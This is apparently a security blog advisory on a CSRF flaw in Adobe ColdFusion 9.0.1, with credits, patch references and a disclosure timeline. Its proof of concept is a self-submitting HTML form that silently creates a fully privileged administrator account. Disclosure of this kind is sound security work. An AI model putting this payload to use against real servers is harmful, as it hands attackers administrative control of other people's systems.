Wednesday, April 25, 2012

Adobe ColdFusion 9.0.1.274733 Cross-Site Request Forgery (CSRF) Vulnerability

Description
Adobe ColdFusion application server enables developers to rapidly build, deploy, and maintain robust Internet applications for the enterprise.

Sow Ching Shiong, an independent vulnerability researcher has discovered Cross-Site Request Forgery vulnerability in Adobe ColdFusion. This issue was discovered in a default installation of Adobe ColdFusion 9.0.1.274733. Other earlier versions may also be affected.


Proof of concept
<html>
<body>
<form action="http://[target]:8500/CFIDE/administrator/security/useredit.cfm" id="csrf" method="post">
<input type="hidden" name="uname" value="attacker" />
<input type="hidden" name="password1" value="passwd123" />
<input type="hidden" name="password2" value="passwd123" />
<input type="hidden" name="Description" value="" />
<input type="hidden" name="userallowrds" value="true" />
<input type="hidden" name="userallowadministrative" value="true" />
<input type="hidden" name="userallow" value="adminapi" />
<input type="hidden" name="grantedRoles" value="coldfusion.collections,coldfusion.datasources,coldfusion.flexdataservices,coldfusion.migrateveritycollections,coldfusion.solrserver,coldfusion.verityk2server,coldfusion.webservices,coldfusion.codeanalyzer,coldfusion.debugging,coldfusion.licensescanner,coldfusion.logging,coldfusion.scheduledtasks,coldfusion.systemprobes,coldfusion.enterprisemanager,coldfusion.eventgateways,coldfusion.cfxtags,coldfusion.corbaconnectors,coldfusion.customtagpaths,coldfusion.applets,coldfusion.packagingdeployment,coldfusion.sandboxsecurity,coldfusion.monitoring,coldfusion.serversettings,coldfusion.serversettingssummary" />
<input type="hidden" name="grantedSandboxes" value="C:\ColdFusion9\wwwroot\CFIDE\,C:\ColdFusion9\wwwroot\WEB-INF\" />
<input type="hidden" name="grantedServices" value="mail,document,pdf,image,chart,pop,upload" />
<input type="hidden" name="adminaction" value="add" />
</form>
<script>
document.getElementById('csrf').submit();
</script>
</body>
</html>

Solution
Adobe has released patches which address this issue. Please see the references for more information.

References

Vendor URL: http://www.adobe.com/support/security/bulletins/apsb11-14.html
Secunia: http://secunia.com/advisories/43013/

Disclosure Timeline
2011-01-21 - Vulnerability discovered.
2011-01-21 - Vulnerability reported to Secunia.
2011-01-21 - Secunia confirmed the vulnerability and contacted the vendor.
2011-06-14 - Patch released.
2011-06-15 - Advisory published by Secunia.

No comments:

Post a Comment

Note: Only a member of this blog may post a comment.